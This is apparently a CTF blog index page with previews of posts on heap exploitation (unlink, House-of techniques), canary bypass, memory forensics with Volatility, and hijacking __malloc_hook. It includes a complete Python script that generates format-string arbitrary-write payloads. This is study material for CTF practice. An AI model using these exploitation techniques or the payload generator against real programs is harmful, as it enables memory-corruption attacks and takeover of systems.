发表于 | 分类于 |

Shanghai-DCTF-2017-pwn

简单分析

简单说一说

程序漏洞不少,但是因为编译时加入的保护措施,导致大多数漏洞无法利用。比赛时一直惯性思维,认为有canary的函数就不会成功利用栈溢出进行攻击。回头才发现一个点,也算是一个比较少见的知识点,可以绕过canary的防护,从而对程序流程进行控制。

阅读全文 »

发表于 | 分类于 |

Heap-Exploitation

Preview

  • Double Free
    • Making malloc return an already allocated fastchunk
  • Forging chunks
    • Making malloc return a nearly arbitrary pointer
  • Unlink Explit
    • Getting (nearly) arbitrary write access
  • OFF-BY-ONE
    • Depending on the one-byte-overflow
  • House of Spirit
    • Making malloc return a nearly arbitrary pointer
  • House of Lore
    • Making malloc return a nearly arbitrary pointer
  • House of Force
    • Making malloc return a nearly arbitrary pointer
  • House of Einherjar
    • Making malloc return a nearly arbitrary pointer
阅读全文 »

发表于 | 分类于 |

CCF2016 软件破解2

分析

此处代码段有无法解析的指令

程序在输入密码后,用输入的密码作为argv[1],以原程序的path作为argv[0]开启了新的子线程

阅读全文 »

发表于 | 分类于 |

Heap Exploitation

Base Knowledge

malloc_chunk

1
2
3
4
5
6
7
8
9
10
11
struct malloc_chunk{
    INTERNAL_SIZE_T        mchunk_prev_size;    /*Size of previous chunk (if free)        */
    INTERNAL_SIZE_T        mchunk_size;         /*Size in bytes, including overhead        */
    struct malloc_chunk* fd;                    /*double links  ----  used only if free.*/
    struct malloc_chunk* bf;
    /*only used for large blocks: pointer to next larger size*/
    struct malloc_chunk* fd_nextsize;
    struct malloc_chunk* bk_nextsize;
}
typedef struct malloc_chunk* mchunkptr;
阅读全文 »

发表于 | 分类于 |

PLAY WITH LINUX HEAP

作者:
memeda@0ops
pwner.xu@gamil.con

BACKGROUND

  1. Linux heap become hard to exploit due to the new version of GLIBC.
    • Hundreds of thousands of assertions there.
    • ASLR and Non-eXecutable heap.
  2. Heap issues are scarce in CTF games.
    • spring up in recent games like HOTCON CTF & Hack.LU CTF.

CATALOGUE

  1. Introduction to GLIBC Heap
  2. View Heap As an Attacker
    • free()
    • malloc()
    • main_arena
    • mmap() & munmap()
  3. Examples
阅读全文 »

发表于 | 分类于 |

karspersky Helpme

常规分析

查看内存快照的属性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
volatility -f ./memory.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/flier/Desktop/karspersky/helpme/memory.vmem)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82961be8L
          Number of Processors : 1
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0x82962c00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2017-09-25 12:18:53 UTC+0000
     Image local date and time : 2017-09-25 15:18:53 +0300
阅读全文 »

发表于 | 分类于 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def format(writes, idx, address_string):
    printed = len(address_string)
    payload = ""
    for where, what in sorted(writes.items(),key = lambda tmp:tmp[1]):
        print where, what
        to_add = (what - printed) &0xffff
        if to_add > 0:
            if to_add < 8:
                payload += (what-printed) * 'a'
            else:
                payload += '%0' + str(to_add) + 'x'
        payload += '%' + str(where + idx) + '$hn'
        printed += to_add
    return  address_string + payload
writes = {}
writes[0] = (0x12345678 >> 16) & 0xffff
writes[1] = 0x12345678 & 0xffff
writes[2] = (0x12abcdef >> 16) & 0xffff
writes[3] = 0x12abcdef & 0xffff
addr_string = '\x12\x34\x56\x78' + '\x12\x34\x56\x78' + '\x12\x34\x56\x78' + '\x12\x34\x56\x78'
print format(writes, 0, addr_string)

发表于 | 分类于 |

format string & reload & __malloc_hook

When we can use format string to write our data to any address, this elf file is marked as reload. So we can’t easily write our data to got table to control the ip.

We can still control the ip by writing data to the address of __malloc_hook in glibc.

阅读全文 »

发表于 | 分类于 |

HEAP UNLINK ATTACK

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#define unlink(P, BK, FD) {
    FD = P->fd;
    BK = P->bk;
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
      malloc_printerr (check_action, "corrupted double-linked list", P);
    else {
        FD->bk = BK;
        BK->fd = FD;
        if (!in_smallbin_range (P->size)
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {
            assert (P->fd_nextsize->bk_nextsize == P);
            assert (P->bk_nextsize->fd_nextsize == P);
            if (FD->fd_nextsize == NULL) {
                if (P->fd_nextsize == P)
                  FD->fd_nextsize = FD->bk_nextsize = FD;
                else {
                    FD->fd_nextsize = P->fd_nextsize;
                    FD->bk_nextsize = P->bk_nextsize;
                    P->fd_nextsize->bk_nextsize = FD;
                    P->bk_nextsize->fd_nextsize = FD;
                  }
              } else {
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;
              }
          }
      }
}
阅读全文 »